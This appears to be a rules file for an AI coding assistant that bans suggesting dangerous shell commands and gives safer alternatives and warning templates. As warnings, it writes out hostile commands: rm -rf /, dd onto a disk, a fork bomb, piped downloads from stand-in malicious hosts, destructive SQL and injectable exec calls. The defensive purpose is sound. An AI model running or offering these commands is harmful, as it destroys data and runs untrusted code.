// Prevents suggesting dangerous shell commands that could harm the system
# Never Execute Unsafe Shell Commands
Never suggest shell commands that could damage systems, delete data, or expose security risks.
## Extremely Dangerous Commands - NEVER Suggest
### Data Destruction
```bash
# NEVER
rm -rf /
rm -rf /*
dd if=/dev/zero of=/dev/sda
mkfs.ext4 /dev/sda1 # without explicit confirmation
```
### Privilege Escalation Without Context
```bash
# DANGEROUS - Don't suggest blindly
sudo chmod 777 /
sudo chown -R user:user /
sudo rm -rf /var/*
```
### Malicious Downloads
```bash
# NEVER
curl unknown-site.com/script.sh | bash
wget -O- http://malicious.com | sh
```
### Fork Bombs
```bash
# NEVER
:(){ :|:& };:
./$0 & ./$0 &
```
## Risky Patterns to Avoid
### Unvalidated User Input in Commands
```javascript
// DANGEROUS
exec(`rm -rf ${userInput}`)
exec("find / -name " + fileName) // Path traversal risk
```
### Broad Wildcard Operations
```bash
# RISKY - Ask for confirmation first
rm -rf .*
chmod 777 *
chown -R user:user /*
```
### Production Database Operations
```bash
# DANGEROUS - Never suggest for production
DROP DATABASE production;
TRUNCATE TABLE users;
DELETE FROM orders WHERE 1=1;
```
## Safe Alternatives
### Instead of rm -rf
```bash
# Bad
rm -rf node_modules
# Better - ask first
"Should I remove node_modules? This will delete all dependencies.
You can restore them with npm install."
# Safest - be specific
rm -rf ./node_modules # Explicit current directory
```
### Instead of chmod 777
```bash
# Bad
chmod 777 file.txt
# Better - explain and use minimal permissions
"This file needs to be writable. I'll use 644 (owner write, others read).
Only use 777 if absolutely necessary and you understand the security implications."
chmod 644 file.txt
```
### Instead of Piped Downloads
```bash
# Bad
curl https://site.com/install.sh | bash
# Better - download, review, then execute
curl -O https://site.com/install.sh
# Review the script first
cat install.sh
# Then execute if safe
bash install.sh
```
## Always Warn About
### Sudo Commands
"This command requires sudo (admin privileges). It will:
- [Explain what it does]
- [Potential risks]
- [Why it's needed]
Proceed only if you understand the implications."
### System-Wide Changes
"This modifies system-wide settings. Impact:
- Affects all users
- May require reboot
- Could break existing configuration
Recommended: Test in development first."
### Data Deletion
"⚠️ This will permanently delete data:
- [What will be deleted]
- [Cannot be undone]
- [Backup recommendation]
Are you sure you want to proceed?"
## Safe Command Practices
### ✅ Use Specific Paths
```bash
# Good
rm -rf ./build/
rm -rf ~/project/node_modules/
```
### ✅ Validate Input
```javascript
// Good - validate before using
function deleteFile(filename) {
if (!/^[a-zA-Z0-9_-]+\.txt$/.test(filename)) {
throw new Error('Invalid filename');
}
exec(`rm ./uploads/${filename}`);
}
```
### ✅ Use Safer Alternatives
```bash
# Instead of rm, move to trash
mv file.txt ~/.trash/
# Instead of chmod 777, be specific
chmod u+x script.sh # Only make executable for owner
# Instead of broad chown
chown user:group ./specific/directory
```
### ✅ Provide Dry-Run Options
```bash
# Show what would be deleted first
find . -name "*.log" -print
# Then if safe, delete
find . -name "*.log" -delete
```
## Required Warnings
Always warn before suggesting commands that:
1. **Require sudo/admin privileges**
- Explain why elevated privileges needed
- What the command will do system-wide
2. **Delete or modify files**
- What will be affected
- Recommend backup first
- Provide undo path if available
3. **Modify permissions**
- Security implications
- Why specific permissions needed
- Risks of overly permissive settings
4. **System configuration changes**
- What will change
- Potential side effects
- How to revert if needed
5. **Network operations with elevated privileges**
- What data is being sent/received
- Security implications
- Alternatives if available
## Template for Risky Commands
```markdown
⚠️ **Warning:** This command [requires sudo/deletes files/etc]
**What it does:**
[Clear explanation]
**Risks:**
- [Risk 1]
- [Risk 2]
**Recommendation:**
1. [Safer alternative if available]
2. [Backup steps if needed]
3. [Verification steps]
**Command:**
```bash
[command]
```
Proceed only if you:
- Understand the implications
- Have backups if needed
- Are certain this is necessary
```
## Examples of Good Warnings
### Example 1: Package Manager
"I'll suggest installing packages with npm. This will:
- Download code from npm registry
- Run install scripts (potential security risk)
- Modify package.json and node_modules
Safer approach:
1. Review package on npmjs.com first
2. Check download count and maintenance
3. Consider using --ignore-scripts if concerned"
### Example 2: Database Migration
"⚠️ This migration will modify production database:
**Changes:**
- Adds new column to users table
- Migrates 1M+ rows
- Estimated time: 5-10 minutes
**Risks:**
- May lock table during migration
- Cannot easily rollback
- Could impact live users
**Recommended steps:**
1. Backup database first
2. Test on staging
3. Run during low-traffic period
4. Monitor during execution"
## The Golden Rule
**When in doubt, ask for confirmation.**
Better to be overly cautious than cause irreversible damage.6 matches